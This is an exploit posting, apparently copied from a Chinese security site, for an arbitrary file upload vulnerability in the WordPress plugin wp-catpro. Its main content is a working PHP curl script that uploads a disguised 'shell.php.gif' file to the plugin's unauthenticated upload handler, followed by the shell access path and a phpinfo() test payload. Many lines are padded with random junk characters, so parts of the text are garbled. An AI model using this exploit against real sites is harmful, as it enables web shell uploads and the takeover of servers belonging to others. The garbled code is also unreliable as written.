Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
9 M, J% v) q2 I/ L: {9 T#-----------------------------------------------------------------------7 N8 [4 O. y ~, j4 Z2 r
5 H: ]3 F! M; h q
作者 => Zikou-16
8 y# }1 V4 ^8 j0 \% O( [邮箱 => zikou16x@gmail.com. _4 ~# E7 y. w+ S
测试系统 : Windows 7 , Backtrack 5r36 b6 N4 B1 R; |7 I, |
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip6 M$ m) D3 }/ h# l% a
####" ]0 ^" A# k, T& q
3 ]+ z* f; G: [2 V$ w6 O7 u2 A
#=> Exploit 信息:/ m) X% ?% M1 x! f) m, A0 b
------------------
* i' X6 ?' B0 [. |- t# 攻击者可以上传 file/shell.php.gif; d! k. H; W$ P
# ("jpg", "gif", "png") // Allowed file extensions
5 U/ D. Z* u0 }0 S+ J. I X# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
/ g. T4 z! X! m* o) g# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
( G; ]" `: c: I. q* [------------------
' B* Q; ^) o" ~/ W$ y- H. S+ g : g$ ?8 H& C3 k# p$ p/ T; ~
#=> Exploit
2 g" T6 i; z$ ?) c-----------' ~/ z& a/ N4 Y
<?php
N3 G* S3 K F ' A+ u# Q: D- ~5 v; Z( ~/ D
$uploadfile="zik.php.gif";8 D% s1 ~4 j: A h, `
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");% b, {+ @* t# y9 z+ Y" b4 Z! a0 S3 t
curl_setopt($ch, CURLOPT_POST, true);( U5 {: o: q h* b }
curl_setopt($ch, CURLOPT_POSTFIELDS,- R" @7 J/ v* r4 N
array('Filedata'=>"@$uploadfile",9 \# ~% W, a$ v2 a. i- q
'folder'=>'/wp-content/uploads/catpro/')); ~) `7 x7 `9 C
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);4 g, y2 [* ^# U( W' H
$postResult = curl_exec($ch);
: x4 X! \# i) z$ dcurl_close($ch);: A" O, y8 [9 s4 f' q% w. y
$ f$ Z8 L$ N! c1 h% q5 {, Y8 t
print "$postResult";
% A6 ~) p9 a3 }+ E: m 0 P8 h7 N! d$ A3 i9 f3 B) R* t1 n4 `
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif/ V9 P: o& @2 h
?>. H' `9 G# K9 l* ]+ D
<?php
3 g0 R$ M2 ^# c( c+ fphpinfo();
) A6 p2 v. \3 Q! B5 n, R; ]?> |